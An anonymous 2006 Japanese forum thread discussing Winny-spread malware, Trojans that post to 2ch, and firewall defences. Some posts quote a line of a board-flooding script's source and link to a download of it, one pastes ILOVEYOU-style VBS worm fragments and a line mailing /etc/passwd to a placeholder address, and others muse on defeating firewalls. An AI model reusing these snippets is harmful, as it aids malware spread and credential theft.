> 205 名前: 動け動けウゴウゴ2ちゃんねる [sage] 投稿日: 2006/04/04(火) 00:43:50 ID:mZwhpHxK0
> 【2ch】書き込みにID認証制を導入―登録型サイトへ移行か 
> http://live22x.2ch.net/test/read.cgi/news/1144069170/ 
>
> 206 名前: 動け動けウゴウゴ2ちゃんねる 投稿日: 2006/04/04(火) 00:43:57 ID:JXx8YAp40
> コレで最後だ!!インディグネイション! 
>
> 1000 名前: 動け動けウゴウゴ2ちゃんねる 投稿日: 2006/04/04(火) 00:47:38 ID:ddgnbPBR0
> コレで最後だ!!インディグネイション! 
>
> ------------------
> 221秒で794レス消費。3.6レス/秒(12934レス/時)か
> ここのウイルスは100レス/時だから、100倍の威力ww


351 :[名無し]さん(bin+cue).rar:2006/04/04(火) 01:12:22 ID:PVPJDKMR0
前からあった爆撃スクリプトだろ。

352 :125.93.8.186:2006/04/04(火) 01:45:14 ID:K0k2fkBv0
・ヌ・モ・・、・茫`、マ・、・茹テゥ`ゥ`ゥ`ゥ`ゥ`ゥ`ゥ`ゥ`ゥ`」。」。

353 :[名無し]さん(bin+cue).rar:2006/04/04(火) 02:15:05 ID:GCTIrwfN0
>>351
これのことをイオナズンって言うんだね
でも、これってスクリプトなの?
そうとは思えないんだが

354 :ea-west-12-41.dsn.jp:2006/04/04(火) 02:30:45 ID:WeVlTN9s0
オナラズン

355 :[名無し]さん(bin+cue).rar:2006/04/04(火) 02:36:54 ID:+iKqanPm0
4月1日4時1分に401をゲットするスレ
http://live22x.2ch.net/test/read.cgi/news/1143830311/

爆撃スクリプトは超強力

356 :[名無し]さん(bin+cue).rar:2006/04/04(火) 02:44:34 ID:rm98HKju0
爆撃ウイルス全然駆除されてないな。
いい加減気づけよ・・・アーシェス・ネイさんよぉ

357 :z57.58-98-194.ppp.wakwak.ne.jp:2006/04/04(火) 07:03:06 ID:0W5mtH800
傘スレ?

358 :[名無し]さん(bin+cue).rar:2006/04/04(火) 10:30:48 ID:S08XnaYi0
>>339
まぁ、当然だわな。
個人情報を扱うところでCaptchaを導入していないところは
信用できないね。
>>331
proxyでport50050はだいたい特定アジアが多い。
中国の場合にはスパイウエアをプロバイダーが配布してる
位で普及率80%以上らしいぞ。

359 :[名無し]さん(bin+cue).rar:2006/04/04(火) 11:06:43 ID:O7WuI1gG0
エクセルでも感染するのか〜

360 :softbank218142002078.bbtec.net:2006/04/04(火) 11:17:25 ID:T9lKlf0k0
デビルイヤーはイヤッーーーーーーーーー!!

361 :[名無し]さん(bin+cue).rar:2006/04/04(火) 11:33:51 ID:wMVQ4wjr0
山田オルタなんだけど感染しても元から色々と対処していれば被害ないと思うんだけどなぁ・・

>感染者のリアルタイムなデスクトップ状況の閲覧(画像で保存される)
>全HDDの中身を見ることができるメールも何もかもすべて見える。


・これはどこかのアップローダ(サーバー)にアップされるということでしょうか?
・それとも山田オルタ自身がサーバー(HTTP?FTP?)ソフトの役割を果たすということでしょうか?

前者なら山田オルタが直接どこかのサーバーに画像を送信してアップするタイプのものなら、
アウトバウンドを制御できるファイアウォールを導入して監視していれば未然に防ぐことが可能
ですよね。山田オルタがWebブラウザを経由してサーバーに画像を保存するタイプのものなら、
対処は難しくなりますよね。アウトバウンドを(送信)制御できるファイアウォールソフトを導入して
いても、Webブラウザの80ポートへのアウトバウンドはほとんどの人が許可していますからね。
ホームページにアクセスする度にいちいち許可するかどうかを求められては実用的ではありま
せんしね。実行ソフト監視ソフト(サンドボックス)を導入しておかしな動作を常に監視している必要
がありますね。これはある程度のスキルも必要になってくるのかな。まあ、プログラムを実行した直
後によく分からんプログラムがWebブラウザ(InternetExploler等)を実行しようとしてたら疑うべきだけど。


362 :[名無し]さん(bin+cue).rar:2006/04/04(火) 11:34:42 ID:wMVQ4wjr0
で、後者だった場合はそれほど対処の難しいウイルスではないよね?ルータでパケットフィルタ
していれば問題ないわけだし。元々サーバー立ち上げている場合は、アプリケーション単位で制
御できるファイアウォールソフトの導入している必要があるよね。例えばHTTPサーバー設置のた
めにルータで80番ポートを開いてた場合、山田オルタにサーバーソフトの役割を果たされたら、外
部からHDDの意図していないHDDのデータとかSSとかにアクセスされちゃうからね。アプリ単位で
設定できるファイアウォールソフトで、使用しているHTTPサーバーソフト経由で80ポートのみインバ
ウンド(受信)を許可するルールを作れば解決するよね。まぁアプリ単位で制御ができないService
Pack2以外のWinXP付属のファイアウォールソフトじゃ駄目だよね。WinXP SP2付属のファイア
ウォールソフトはアプリ単位で制御できるけど、機能を無効にしちゃうウイルスが出回ってる?から
他のファイアウォールソフト入れてた方が無難なのかな。それでも100%安全とは言い難いけどリスク
は相当減らせると思う。


・感染者同士でリンクを作る

これも山田オルタに感染してもファイアウォールソフト導入しているなり、ルータでパケットフィルタ
するなりしていればアクセスされる心配はないよね。相手に繋ぎにいっちゃう場合の対処は、アウト
バウンドを制御できるファイアウォールソフトでで監視してれば問題ないし。

363 :[名無し]さん(bin+cue).rar:2006/04/04(火) 11:36:25 ID:CXBYqiCs0
では次のニュースです

364 :[名無し]さん(bin+cue).rar:2006/04/04(火) 11:45:09 ID:bwababBB0
長文書く暇あったらググレカス

365 :[名無し]さん(bin+cue).rar:2006/04/04(火) 11:47:41 ID:ukZePar60
>>362
そうだね
君が日本のパソコン全部にFW入れてきてくれれば山田オルタは即解決するよ

366 :[名無し]さん(bin+cue).rar:2006/04/04(火) 12:14:58 ID:3VOArzosO
ある程度のセキュリティ意識とスキルがある人が一番やっかいなウイルスがWebブラウザ経由
したりしてデスクトップのスクショ等をどこかのアップローダにアップしちゃうタイプのもの
だよね。ある程度スキルがある人なら、個人を特定できるようなファイルは少なくと
もHDDには保存してないだろうし、バックアップソフトで定期的にバックアップをとって、
HDDのデータが破壊されてもすぐに復旧できるようにはしてあるしね。
アウトバウンドのリークテストで100%防げるファイアウォールソフトは存在しないから、プロ
セス監視ソフト使って神経質に見張ってなくちゃならんし、ネットで買い物もできなくなるし、
ログインも迂闊にできなくなる。

367 :[名無し]さん(bin+cue).rar:2006/04/04(火) 12:18:00 ID:EvUjvwQo0









????

368 :[名無し]さん(bin+cue).rar:2006/04/04(火) 13:01:09 ID:F5UkAkh90
山田ってzlib必要なのか?

369 :[名無し]さん(bin+cue).rar:2006/04/04(火) 13:41:50 ID:RXWJNLdY0
こんなに読む気の起こらない文章も珍しい。内容以前の問題。

370 :[名無し]さん(bin+cue).rar:2006/04/04(火) 13:45:53 ID:XaHx8lO60
とんこつラーメンの残り+醤油+ご飯=ウマー

371 :[名無し]さん(bin+cue).rar:2006/04/04(火) 13:54:58 ID:ViDy5l/50
>>367
明日もエッチ。焦ろ!
だと思う。

372 :[名無し]さん(bin+cue).rar:2006/04/04(火) 15:18:48 ID:9J6XfAOp0
>>361-362
前者ではなく、山田が鯖立てる。
UPnP使ってるからFWは突破。
長すぎなので、一部しかよんでない。

373 :[名無し]さん(bin+cue).rar:2006/04/04(火) 15:25:26 ID:L2XWI+rG0
山田は、専用スレ行ったほうがわかるんじゃ?
http://tmp6.2ch.net/test/read.cgi/download/1143810725/14


374 :p109.net059086006.tnc.ne.jp:2006/04/04(火) 15:59:14 ID:q1h/D9640
糞スレ浮上 ちんぽっぽ!!

375 :[名無し]さん(bin+cue).rar:2006/04/04(火) 16:02:08 ID:qxY5E4O+0
ttp://www.yomiuri.co.jp/national/news/20060404i504.htm
強力新種ウイルス、ウィニーなしでも情報流出


376 :[名無し]さん(bin+cue).rar:2006/04/04(火) 16:26:37 ID:L2XWI+rG0
>>375
意図がわからないってIPAの中の人言ってるけど、
予告ウイルスの意図する所がわからないって事か?


377 :[名無し]さん(bin+cue).rar:2006/04/04(火) 16:35:54 ID:5l2ndWTK0
愉快犯のフリをした、大手マスコミの2ch潰しかも。

378 :[名無し]さん(bin+cue).rar:2006/04/04(火) 16:37:18 ID:Y+iUqVxF0
>政府はウイルス作成や所持なども処罰する方向で検討している。

むぅ、今まで拾ったウィルスは全てコレクションにしているんだが・・・(汗)

379 :[名無し]さん(bin+cue).rar:2006/04/04(火) 16:37:36 ID:KaxJZnh80
ウイルス作者の意図なんか考えるより
馬鹿に早く気づかせて駆除する方法考えろよ

380 :[名無し]さん(bin+cue).rar:2006/04/04(火) 16:45:57 ID:RXWJNLdY0
>所持なども処罰

気に食わない奴のPCにウイルス入れておけばいいってことか!

381 :[名無し]さん(bin+cue).rar:2006/04/04(火) 17:04:01 ID:5l2ndWTK0
>>380
単なる感染者もセキュリティ対策不備の罪で処罰されると。
ウイルス活動はプロバイダ履歴に残るから、本人特定も容易だしな。
罰金を徴収すれば、実に広範囲で継続的な収入源の出来上がり。

382 :[名無し]さん(bin+cue).rar:2006/04/04(火) 17:06:29 ID:L2XWI+rG0
>>381
ウイルス対策ソフト入れないでPC売れば、ネット繋ぐだけで罰金(゜д゜)ウマー

383 :[名無し]さん(bin+cue).rar:2006/04/04(火) 17:08:35 ID:X7FJxQwx0
>>378
漏れも漏れもwwwwwwwwwww
(ii!゚Д゚ テラヤバス?

384 :[名無し]さん(bin+cue).rar:2006/04/04(火) 17:23:25 ID:ZKJvBGRm0
まずウイルスを定義することになって
次にその定義から外れた新種が出てくるという流れと見た

385 :[名無し]さん(bin+cue).rar:2006/04/04(火) 17:26:28 ID:wMVQ4wjr0
>>372
UPnPを使っているにしてもWinnyで落とした実行ファイルを実行した直後に、見知らぬ
プログラムがルータにアクセスするはずだよ。アウトバウンド制御できるファイアウォール
入れてた場合はすぐにおかしいと分かるはず。UPnP使わないなら無効する方法もあるし。

386 :[名無し]さん(bin+cue).rar:2006/04/04(火) 17:26:57 ID:XaHx8lO60
>>383
俺カスケードとかヤンキードゥードルとか持ってるwww

387 :[名無し]さん(bin+cue).rar:2006/04/04(火) 17:33:26 ID:Eo1IlIDx0
UPnPを使わなくちゃいけないケースってあるの?
ポト開放のやり方知らん人間以外は無効にしておいた方がいいと思うんだが

388 :[名無し]さん(bin+cue).rar:2006/04/04(火) 17:43:42 ID:L2XWI+rG0
>>387
デフォルトでONになってるんだよなぁ・・・

389 :[名無し]さん(bin+cue).rar:2006/04/04(火) 17:45:34 ID:y6vjh0Wc0
ttp://www.forest.impress.co.jp/article/2006/04/04/v3antinnyc.html
“ウィニー”の無料検出ツール、「Share」本体の検出や関連ウイルス駆除に対応

390 :[名無し]さん(bin+cue).rar:2006/04/04(火) 17:56:58 ID:aUX7u+MR0
>>378
コレクションどころか配布しており
現行の法にも触れる>>239のリンク先の馬鹿をさっさと処罰して欲しいのでありますが。

391 :[名無し]さん(bin+cue).rar:2006/04/04(火) 18:03:32 ID:AA1CcObh0
>>386
めりっさちゃん在宅(w

392 :[名無し]さん(bin+cue).rar:2006/04/04(火) 18:12:24 ID:ZKJvBGRm0
>>390
現行の法に触れてるなら通報すれば良いんじゃない?
具体的に何という法に触れてるか明らかにすると効果的だと思うよ

393 :[名無し]さん(bin+cue).rar:2006/04/04(火) 18:44:01 ID:b1WkOkEg0
>>239の馬鹿に関しては

ttp://bbs.infoseek.co.jp/Board01?user=dentu-tarou1983
掲示板があるから、そこで作者に警告してやってくれ。
トロイ認定されてるならなおのこと。

394 :[名無し]さん(bin+cue).rar:2006/04/04(火) 18:49:34 ID:BmDlDjPn0
>>239のサイトのAntinny.ZZって自称してるファイルはバスター先生だとTROJ_ANTINNY.BHって名前になってるな。

395 :[名無し]さん(bin+cue).rar:2006/04/04(火) 18:50:46 ID:f/bTJUQ90
【Winny】 愛媛県警、架空で捜査報告書作ったことが発覚…流出ファイルに捏造内容が
http://news19.2ch.net/test/read.cgi/newsplus/1144109500/

正義のウィルステラワロス

396 :[名無し]さん(bin+cue).rar:2006/04/04(火) 18:55:42 ID:9J6XfAOp0
>>385
たしかにそうなんだが、
FW入れてたり、UPnP切ってる奴は感染しない。
ny初心者だとかが感染してるから仕方ないのよ・・・。

397 :[名無し]さん(bin+cue).rar:2006/04/04(火) 18:59:01 ID:LmNQdTcb0
ようやくわかった。

作者はエシュロンのカウンターシステムを作ろうとしているんだよ!

398 :あぼーん:あぼーん
あぼーん

399 :[名無し]さん(bin+cue).rar:2006/04/04(火) 20:23:58 ID:NLtGPDv00
携帯の番号・・・・

400 :[名無し]さん(bin+cue).rar:2006/04/04(火) 20:38:59 ID:9cf1PkXW0
みんな!再取得に備えろ!

401 :[名無し]さん(bin+cue).rar:2006/04/04(火) 20:53:46 ID:L2XWI+rG0
http://qb5.2ch.net/test/read.cgi/sec2chd/1144022103/160-170

って事は、フシアナ爆撃って山田っぽい事になってるの?

402 :[名無し]さん(bin+cue).rar:2006/04/04(火) 22:17:43 ID:XcOAH6zs0
シマンテックの解説見ると停止するプロセスの中に有名所のPFWが並んでる
だからPFWは先にそのプロセス止められちゃうみたいな感じなんだが

403 :[名無し]さん(bin+cue).rar:2006/04/04(火) 23:04:24 ID:wMVQ4wjr0
漏れはファイアウォールソフトにOutpostのPro版使ってるんだけど、強制終了の対象に
なってるみたいだね。パスワードで強制終了するの保護してるけど効果あるのかどうか
試してみるか・・


404 :[名無し]さん(bin+cue).rar:2006/04/04(火) 23:11:22 ID:LmNQdTcb0
>>403
その保護って、タスクマネージャからの強制終了に対処できてる?

405 :[名無し]さん(bin+cue).rar:2006/04/04(火) 23:25:59 ID:6ID6V4J40
ブラウザーの話題が出てるからついでにIEのパッチ欲しいか?
MSが鈍いから他から出てるのがあるぞ。
http://www.eeye.com/html/research/alerts/AL20060324.html

406 :[名無し]さん(bin+cue).rar:2006/04/04(火) 23:26:25 ID:wMVQ4wjr0
>>404
今試してみましたが、タスクマネージャーから強制終了しようとしてもアクセス拒否で終了できませんね。
パスワード設定しててもしてなくても関係ないみたいです。パスワード設定すると、設定を変えようとしたり、
タスクマネージャーから終了した場合に入力を求められるだけみたいですね。フリー版は使ったことないので
分かりませんが

407 :[名無し]さん(bin+cue).rar:2006/04/04(火) 23:27:30 ID:wMVQ4wjr0
×パスワード設定すると、設定を変えようとしたり、タスクマネージャーから終了した場合に入力を求められるだけみたいですね。
○パスワード設定すると、設定を変えようとしたり、タスクバーから終了した場合に入力を求められるだけみたいですね。

408 :p1146-ipbf08kokuryo.gunma.ocn.ne.jp:2006/04/04(火) 23:35:22 ID:BAFw6NiH0
白井裕二

409 :[名無し]さん(bin+cue).rar:2006/04/04(火) 23:35:30 ID:f/P/tLsn0
まずセキュリティソフトを止めるってのは結構前からあるから
ちゃんとした所なら対策取ってると思う。
あと古いのも心配。

410 :[名無し]さん(bin+cue).rar:2006/04/04(火) 23:39:40 ID:r94jzaRg0
>>1 ドナルドかよ!

411 :[名無し]さん(bin+cue).rar:2006/04/05(水) 00:30:55 ID:smcNJsxu0
>>408
まだ焼かれて無いのか

412 :n219077192092.netvigator.com:2006/04/05(水) 03:34:35 ID:iF7ALuGO0
http://nero-online.org/lastmeasure/

413 :[名無し]さん(bin+cue).rar:2006/04/05(水) 04:31:38 ID:GIpTB+RC0
もうめんどくさいから、ファイル全部スキャンして
2chに書き込みそうな物を全部削除するウィルス作って配るってどう?

414 :zaqdb73228f.zaq.ne.jp:2006/04/05(水) 08:53:36 ID:ShZfMP8t0
アーシェス・ネイ

415 :ea-west-2-205.dsn.jp:2006/04/05(水) 08:56:50 ID:v8bhoUZ30
うんこもりもりちんちんしゅしゅ

416 :[名無し]さん(bin+cue).rar:2006/04/05(水) 09:03:16 ID:2tvmF81Y0
>>415

417 :[名無し]さん(bin+cue).rar:2006/04/05(水) 09:11:45 ID:I0PNf0gN0
山田オルタに
バックグラウンドで主要なファイアウォールソフトの設定を弄る機能。
パスワード保護される場合はパスワード解除機能。
主要なルータのUPnPをオンにする機能。
パスワード保護される場合はパスワード解除機能。
が付けばどんなセキュリティソフト使っても対処できなさそうだよね。
難しいだろうけど


418 :[名無し]さん(bin+cue).rar:2006/04/05(水) 09:12:54 ID:haN95Cx60
至れり尽くせりだなぁ

419 :[名無し]さん(bin+cue).rar:2006/04/05(水) 09:43:28 ID:FFDK2P0k0
質問です。nyとShareを同時に稼動させていたのですが、
どうもCPU使用率が100パーセントになりやすいので
タスクマネージャを開いて見て見たところ、「WinRAR.exe」のプロセスが幾つもあり、
それがCPUを半分ほど食っていたことがわかりました。プロセスを全て終了させたら、CPU使用率もだいぶ減りました。
しかし、その時書庫を開いていたわけでもないのに、何故複数の{WinRAR」プロセスがあったのでしょうか。


420 :[名無し]さん(bin+cue).rar:2006/04/05(水) 10:05:18 ID:F2J9iSqe0
>>417
そんなことここに書くと作者が参考にしちゃうぞ

421 :[名無し]さん(bin+cue).rar:2006/04/05(水) 10:58:40 ID:u8VAryYa0
ルータは感染PCとは隔離されているので中々難しいが、それ以外なら
既に実装されてるトロイがある。
メモリ書き換えてallowとか。数バイト書き換えるだけで通過するらしい。

422 :[名無し]さん(bin+cue).rar:2006/04/05(水) 12:03:48 ID:yUzBh9rT0
ソフトウェアなファイアウォールのクラックはできるかもしれないけ
れど、ハードウェアルータにたいする攻撃は難しいんじゃないかな。

メーカー謹製のバックドアを使うか、またはユーザーがクライアント
からルータの設定を変更する際に使った認証をログ取って利用するか。

423 :[名無し]さん(bin+cue).rar:2006/04/05(水) 12:42:08 ID:KJXWjkfT0
セキュ版からのコピペだがこんなのがあった。

http://pc8.2ch.net/test/read.cgi/sec/1143699841/28
>ファイアーウォールの性能を示す有名なリークテスト結果。
>ZoneAlarmは無料版と有料版で凄い差があるので注意。
>
>http://www.firewallleaktester.com/tests_overview.php
>Firewalls outbound application filtering VS Leak Tests
>
>1位 Jetico 1.0.1.61             85.2%   ADVANCED +
>2位 Outpost 3.5.641.6214 (458)     74 %   ADVANCED
>3位 Look'n'Stop 2.05p3          74 %   ADVANCED
>4位 ZoneAlarm Pro 6.1.737.000     72.2%  ADVANCED
>5位 Norton 2006 (9.0.0.73)        70.3%  ADVANCED
>6位 PrivateFirewall 5.0.3.9         55.5%   HIGH
>7位 Sumbelt Kerio 4,2,3,912       40 %    MEDIUM
>8位 comodo 1.1.005            35.2%   MEDIUM
>9位 Desktop Firewall 8.5(260)       33.3%   MEDIUM
>10位 Net Op 3.0.0.180           33.3%   MEDIUM
>11位 Personal Firewall Plus 7.0.152   18.5%   LOW
>12位 Netveda 3.61.0002          18.5%   LOW
>13位 ZoneAlarm Free 6.1.737.000     14.8%   LOW
>14位 Filesclab Pro 3.0.0.8686       11.1%   LOW
>15位 Windows Firewall (SP2)        0 %    X


424 :[名無し]さん(bin+cue).rar:2006/04/05(水) 12:59:28 ID:5Nnqpigx0


425 :[名無し]さん(bin+cue).rar:2006/04/05(水) 13:05:46 ID:iPxs+K1t0
>>419
起動したから

426 :[名無し]さん(bin+cue).rar:2006/04/05(水) 13:53:05 ID:QpB6Ilb50
ニフティへの復讐テロウイルスはまだですか? なんて言うのは不謹慎。


> ※嘘ニュースですよ(゚Д゚)
>
>
> ■ Winnyを規制したニフティへの復讐ウイルスが登場
>
> 3月に Winnyの規制を発表したニフティへの「復讐」を目的とした新種のウイルスが登場し関係者を困惑させている。
> このウイルス( Antinny.Revenge.XX )は、Winny経由で拡散し、ニフティ会員を集中的に攻撃するのが特徴だ。
> この「ニフティ攻撃ウイルス」は、Googleなどで ニフティ会員のメールアドレスを収集し、そのアドレスに無差別に
> 迷惑メールを送るというもの。メール内容は「ニフティからの緊急のお知らせです」「至急サポートセンターまで
> ご連絡下さい」などというもので、この内容を信じたニフティ会員からサポートセンターに電話やメールが殺到し、
> 業務に支障が出ている。
> 今回のウイルスは「ネットは Webとメールだけ、Winnyなど使ったこともない」という会員もターゲットにしているだけに
> 影響は大きく、ニフティへの無差別テロだという声も上がっている。
> ニフティでは注意を呼びかけているが、ブロードバンド会員だけでも約130万人もいるため、事態は収束しそうにない。
> また、ウイルスの亜種も次々と登場している。例えば、今月1日に発見された Antinny.Revenge.ZZは、ウイルス感染者が
> ニフティ会員の場合、無差別に ポータルサイトや 企業・個人サイト、Blog、政府・官庁への DDOS攻撃を行う。
> 攻撃をされたサイトは ニフティからのアクセスを全面的に遮断するなどの措置をとるため、多くのニフティ会員が巻き添え
> を喰らった格好だ。
> このような事態が続く中、一部ではニフティ離れも進んでいる。東京の会社員Aさんは「長年ニフティを使ってきましたが、
> 最近ではニフティ会員というだけでアクセスを禁止され、ネットを利用することもままならない。Winnyなどには 無関係の
> 私まで巻き込まれるのはごめんだ。」と語り、ニフティを解約した。


427 :[名無し]さん(bin+cue).rar:2006/04/05(水) 18:05:13 ID:UbwoY5VV0
ジョークを装った教唆にしか見えんなw

428 :[名無し]さん(bin+cue).rar:2006/04/05(水) 19:04:42 ID:dsYNf88p0
感染者のクラスタとか検索ワードの設定ファイルあさって
そのワード含むスレ探して爆撃するような新種があるってマジ?このままじゃまともなスレタイ1個もなくなりそ

429 :[名無し]さん(bin+cue).rar:2006/04/05(水) 22:02:03 ID:T+ma3k8+0
これ、じわじわと話題になってきてるね。
収集家のなれの果て? それとも‥‥。

ttp://ameblo.jp/jingi-naki/entry-10010989736.html

430 :[名無し]さん(bin+cue).rar:2006/04/05(水) 22:44:45 ID:9QOWHU7/0
何の名簿なのか判明したときそこに恐怖が

431 :p006.net059086018.tnc.ne.jp:2006/04/05(水) 23:28:31 ID:BH2i5C7a0
熊田曜子はガバガバだったわwwww

432 :[名無し]さん(bin+cue).rar:2006/04/06(木) 12:39:09 ID:IqyuQ5bd0
>>426
通報しとく?

433 :[名無し]さん(bin+cue).rar:2006/04/06(木) 12:40:21 ID:m1MB175e0
オロナミンC!

434 :[名無し]さん(bin+cue).rar:2006/04/06(木) 14:00:07 ID:5ue+p+mm0
奈良県
http://tmp6.2ch.net/test/read.cgi/kitchen/1142675974/467-

これって山田オルタの派生?暗号臭いが

435 :[名無し]さん(bin+cue).rar:2006/04/06(木) 17:50:49 ID:GlMzQebX0
>>434
そういうタイプの荒らし昔からあったよ。たぶんスクリプト。

436 :[名無し]さん(bin+cue).rar:2006/04/06(木) 17:57:26 ID:GlMzQebX0
>>434
そこの一般市民 ◆byNTTuThqcってのがリアルメンヘラーだった某有名荒らしを思い起こさせる…
たぶんウイルス作者もそういう人物なのかなあとふと思った
暴露ウイルスで他人のプライバシーをさらけ出して世間を騒がせ、2ちゃんねるを騒がせ優越感を得る。
相当心の病んだ人物なのは間違いないんだろうなあ。

437 :[名無し]さん(bin+cue).rar:2006/04/06(木) 18:26:54 ID:4PHDsPx10
まあP2Pやってるような人間が心が病んでるとか言える立場ではないと思うがW

438 :[名無し]さん(bin+cue).rar:2006/04/06(木) 18:28:23 ID:W8CWtdpR0
pp2

439 :[名無し]さん(bin+cue).rar:2006/04/06(木) 21:33:02 ID:dod2t4OH0
ttp://internet.watch.impress.co.jp/cda/news/2006/04/06/11546.html
「安田美沙子大好き」「蟹工船」など、2ちゃんねるに書き込む新ウイルス
シマンテックは4日、掲示板「2ちゃんねる」に書き込むトロイの木馬型ウイルス「Trojan.Sufiage」を危険度“1”で警告した。

このウイルスの感染経路などは明らかにされていないが、ウイルスが実行されると、2ちゃんねるの「ダウンロードソフト」板から、
メッセージボードリストを抽出し、そのリストに対して特定の文字列群からランダムに抜き出した文字列を書き込む。

シマンテックによれば、「安田美沙子大好き」「カッパってほんとにいるのかな?」「誰か爆弾の作り方教えてくれ」
「床屋はやめとけwww」「美容室ぐらい行けよwww」「火の玉キャッチボール」「ワタナベジャンプ」「ロケットでつきぬけろ!」「モーニング息子。」
「蟹工船」「Down板の皆様がこのプログラムによりたくさんの幸せを得ることができますよう」「英雄伝説VI 空の奇跡SC まだぁ〜?」などと書き込むという。

このほか、メッセージボード上には感染したPCのIPアドレスも公開する。

2ちゃんねるに書き込むウイルスは、山田ウイルス(トレンドマイクロでは「TROJ_MELLPON.A」)などが有名だ。
3月には「Trojan.Kakkeys.D」というウイルスも発見されている。また、最近では正体不明の「イオナズンスクリプト」として、
2ちゃんねるに対してあたかも“爆撃”するように、秒間数件の書き込みを行なうプログラムもあるようだ。

中には意味のない言葉の書き込みだけでなく、情報流出の恐れがあるウイルスもある。
また、イオナズンスクリプトは、ボットに感染したPCによる攻撃とも考えられる。
不審なファイルのダウンロードや起動は控えるべきだろう。


440 :h219-110-195-046.catv02.itscom.jp:2006/04/06(木) 22:01:34 ID:nYSEIskg0
もう8時か・・・

441 :[名無し]さん(bin+cue).rar:2006/04/06(木) 22:08:19 ID:T6s5i4zV0
http://www.itmedia.co.jp/enterprise/articles/0604/04/news003.html
山田オルタネイティブ」の動作を知る

442 :[名無し]さん(bin+cue).rar:2006/04/06(木) 22:10:20 ID:GlMzQebX0
どんどん2chとのコラボが進んでいくな
これだけ見てもウイルス作者がかなりの2ch依存症なのが見て取れる
少なくとも爆撃の対象にしてる板が自分の巡回ルートなのは間違いない

443 :[名無し]さん(bin+cue).rar:2006/04/06(木) 22:20:12 ID:Fs3iu3Ag0
いつのまに呼称が> 山田オルタネイティブ?

444 :[名無し]さん(bin+cue).rar:2006/04/06(木) 22:35:53 ID:cMCcyxAC0
ITmediaの中の人はエロゲ好き

445 :[名無し]さん(bin+cue).rar:2006/04/06(木) 22:41:55 ID:vlAZQDPw0
>>443
ITmediaの記事に注があるから、読め

446 :[名無し]さん(bin+cue).rar:2006/04/06(木) 22:46:09 ID:EYd4/+ay0
>>445
あの注釈、2chと一線を隔てたいって思いが込められてるっぽいね。

447 :[名無し]さん(bin+cue).rar:2006/04/06(木) 22:47:47 ID:uz7U03gd0
そのうち意味のあるレスを書き込んだり、スレ立てしたりするウイルスが出現しそう。
ログから単語を拾って組み合わせれば、一見意味がありそうに見えるだろうし。

448 :[名無し]さん(bin+cue).rar:2006/04/06(木) 22:49:45 ID:vlAZQDPw0
>>447
なにその人工無能

449 :[名無し]さん(bin+cue).rar:2006/04/06(木) 22:51:04 ID:/UGEUFL/0
レスに反応して返すウイルス作ったら住人の反応が面白そうだなw

450 :[名無し]さん(bin+cue).rar:2006/04/06(木) 23:52:37 ID:FdGAMbWY0
ID:fdRBXsz30へ。

>300 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2006/04/03(月) 15:09:31 ID:fdRBXsz30
>エロゲスレにも書いたんだけど
>[NoCD][060407]かみさまの宿っ!_NODVD.rar 194,946 c132da4153aa1e702a5e2658c3a799b670e71370
>にfusiana爆撃のソース(メインプログラムのみ、pascal)が入ってた。

>これによると Timer1.Interval := 80000; なので爆撃は80秒に1回、
>kakiko(host,bbs,getdat(listbox2.Items.Strings[200 + Random(100)]),'fusianasan','age',ListBox3.Items.Strings[Random(152)]);
>なのでおそらく200〜300番に下がってるスレ(ランダム)に
>リソース、RC Data/TFORM1内に入ってる152種類定義されている文字列のいずれかを書き込む。

>作者がソースを公開した理由は不明…亜種を呼び込むため?


>>300のファイルが見つからないんだがwinnyじゃない?share?
もしよかったらうpしてくれないか?
kakiko(host,bbs,getdat(listbox2.Items.Strings[200 + Random(100)]),'fusianasan','age',ListBox3.Items.Strings[Random(152)]);

このkakikoとgetdatに見覚えがある。
前にニュー速で乳酸菌プログラムが公開されてたときに書き込みのサンプルかなんかでうpされてたものの流用かもしれない。


451 :[名無し]さん(bin+cue).rar:2006/04/06(木) 23:55:58 ID:DhprNSo40
http://qb5.2ch.net/test/read.cgi/operate/1144071322/470

452 :[名無し]さん(bin+cue).rar:2006/04/06(木) 23:58:43 ID:mdSzaIhr0
>446
ttp://www.itmedia.co.jp/enterprise/
の下のほう見れば分かるが、「オルタナティブ・ブログ」なんてのを出してるから
混同されたくないっていうことかと

453 :[名無し]さん(bin+cue).rar:2006/04/07(金) 00:14:46 ID:7t/IAz2z0
>>451
http://qb5.2ch.net/test/read.cgi/operate/1144071322/473
rubyで書かれたやつなら取り出せる

簡単な方法
->実行させる

454 :[名無し]さん(bin+cue).rar:2006/04/07(金) 01:34:57 ID:qUD+WLjg0
>>450
お前このハッシュ見てWinnyじゃない?とか頭の悪い発言するなよ・・・。
見つからないんじゃなく探してないことがモロバレだ。

455 :[名無し]さん(bin+cue).rar:2006/04/07(金) 01:35:27 ID:vIjdzFRV0
>>450
ほいよ
ttp://www.vipper.net/vip27664.rar.html
rarパス kakiko

456 :[名無し]さん(bin+cue).rar:2006/04/07(金) 01:40:52 ID:92K/QMzq0
もともとはオルタネイティブだったんじゃなかった?
エロゲかなんかの名前で

457 :[名無し]さん(bin+cue).rar:2006/04/07(金) 01:41:35 ID:9cCLQe2N0
べつもんだろ

458 :[名無し]さん(bin+cue).rar:2006/04/07(金) 01:45:39 ID:1GgWwPm+0
>>455
thx!
これだ。ニュー速でさらされてたやつ。procedure TForm1.Timer1Timer以外は全部流用。
作者はスキル低い。PASも同封しないと関数使えないと思ったのかもなw

459 :[名無し]さん(bin+cue).rar:2006/04/07(金) 02:09:58 ID:92K/QMzq0
イオナズンきた

動画2ちゃんねる稼動のお知らせ。
http://live22x.2ch.net/test/read.cgi/news/1144341946/

460 :[名無し]さん(bin+cue).rar:2006/04/07(金) 02:40:36 ID:YAh8Zr+R0
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

461 :[名無し]さん(bin+cue).rar:2006/04/07(金) 02:41:47 ID:YAh8Zr+R0
age忘れ

462 :[名無し]さん(bin+cue).rar:2006/04/07(金) 09:43:48 ID:G0KyzaeE0
sage

